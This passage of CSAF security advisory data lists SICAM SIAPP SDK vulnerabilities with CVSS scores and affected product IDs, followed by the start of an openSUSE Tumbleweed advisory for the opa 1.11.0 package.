"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2026-25571"
},
{
"cve": "CVE-2026-25572",
"cwe": {
"id": "CWE-130",
"name": "Improper Handling of Length Parameter Inconsistency"
},
"notes": [
{
"category": "other",
"text": "Improper Handling of Length Parameter Inconsistency",
"title": "CWE-130"
},
{
"category": "description",
"text": "The SICAM SIAPP SDK server component contains a stack overflow vulnerability caused by insufficient maximum length checks on certain variables, which can result in process crashes and denial of service.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-25572 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-25572.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2026-25572"
},
{
"cve": "CVE-2026-25573",
"cwe": {
"id": "CWE-73",
"name": "External Control of File Name or Path"
},
"notes": [
{
"category": "other",
"text": "External Control of File Name or Path",
"title": "CWE-73"
},
{
"category": "description",
"text": "The application executes shell commands constructed from user input, exposing it to command injection vulnerabilities that can lead to full system compromise.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-25573 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-25573.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2026-25573"
},
{
"cve": "CVE-2026-25605",
"cwe": {
"id": "CWE-73",
"name": "External Control of File Name or Path"
},
"notes": [
{
"category": "other",
"text": "External Control of File Name or Path",
"title": "CWE-73"
},
{
"category": "description",
"text": "The application fails to properly validate file paths during deletion, enabling attackers to delete authorized files or sockets, potentially causing service disruption or denial of service.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-25605 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-25605.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2026-25605"
}
]
}
OPENSUSE-SU-2025:15775-1
Vulnerability from csaf_opensuse - Published: 2025-11-27 00:00 - Updated: 2025-11-27 00:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:opa-1.11.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-1.11.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-1.11.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-1.11.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.x86_64 | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "opa-1.11.0-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the opa-1.11.0-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15775",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15775-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64756 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64756/"
}
],
"title": "opa-1.11.0-1.1 on GA media",
"tracking": {
"current_release_date": "2025-11-27T00:00:00Z",
"generator": {
"date": "2025-11-27T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15775-1",
"initial_release_date": "2025-11-27T00:00:00Z",
"revision_history": [
{
"date": "2025-11-27T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "opa-1.11.0-1.1.aarch64",
"product": {
"name": "opa-1.11.0-1.1.aarch64",
"product_id": "opa-1.11.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "opa-bash-completion-1.11.0-1.1.aarch64",
"product": {
"name": "opa-bash-completion-1.11.0-1.1.aarch64",
"product_id": "opa-bash-completion-1.11.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "opa-fish-completion-1.11.0-1.1.aarch64",
"product": {
"name": "opa-fish-completion-1.11.0-1.1.aarch64",
"product_id": "opa-fish-completion-1.11.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "opa-zsh-completion-1.11.0-1.1.aarch64",
"product": {
"name": "opa-zsh-completion-1.11.0-1.1.aarch64",
"product_id": "opa-zsh-completion-1.11.0-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "opa-1.11.0-1.1.ppc64le",
"product": {
"name": "opa-1.11.0-1.1.ppc64le",
"product_id": "opa-1.11.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "opa-bash-completion-1.11.0-1.1.ppc64le",
"product": {
"name": "opa-bash-completion-1.11.0-1.1.ppc64le",
"product_id": "opa-bash-completion-1.11.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "opa-fish-completion-1.11.0-1.1.ppc64le",
"product": {
"name": "opa-fish-completion-1.11.0-1.1.ppc64le",
"product_id": "opa-fish-completion-1.11.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "opa-zsh-completion-1.11.0-1.1.ppc64le",
"product": {
"name": "opa-zsh-completion-1.11.0-1.1.ppc64le",
"product_id": "opa-zsh-completion-1.11.0-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "opa-1.11.0-1.1.s390x",
"product": {
"name": "opa-1.11.0-1.1.s390x",
"product_id": "opa-1.11.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "opa-bash-completion-1.11.0-1.1.s390x",
"product": {
"name": "opa-bash-completion-1.11.0-1.1.s390x",
"product_id": "opa-bash-completion-1.11.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "opa-fish-completion-1.11.0-1.1.s390x",
"product": {
"name": "opa-fish-completion-1.11.0-1.1.s390x",
"product_id": "opa-fish-completion-1.11.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "opa-zsh-completion-1.11.0-1.1.s390x",
"product": {
"name": "opa-zsh-completion-1.11.0-1.1.s390x",
"product_id": "opa-zsh-completion-1.11.0-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "opa-1.11.0-1.1.x86_64",
"product": {
"name": "opa-1.11.0-1.1.x86_64",
"product_id": "opa-1.11.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "opa-bash-completion-1.11.0-1.1.x86_64",
"product": {
"name": "opa-bash-completion-1.11.0-1.1.x86_64",
"product_id": "opa-bash-completion-1.11.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "opa-fish-completion-1.11.0-1.1.x86_64",
"product": {
"name": "opa-fish-completion-1.11.0-1.1.x86_64",
"product_id": "opa-fish-completion-1.11.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "opa-zsh-completion-1.11.0-1.1.x86_64",
"product": {
"name": "opa-zsh-completion-1.11.0-1.1.x86_64",
"product_id": "opa-zsh-completion-1.11.0-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
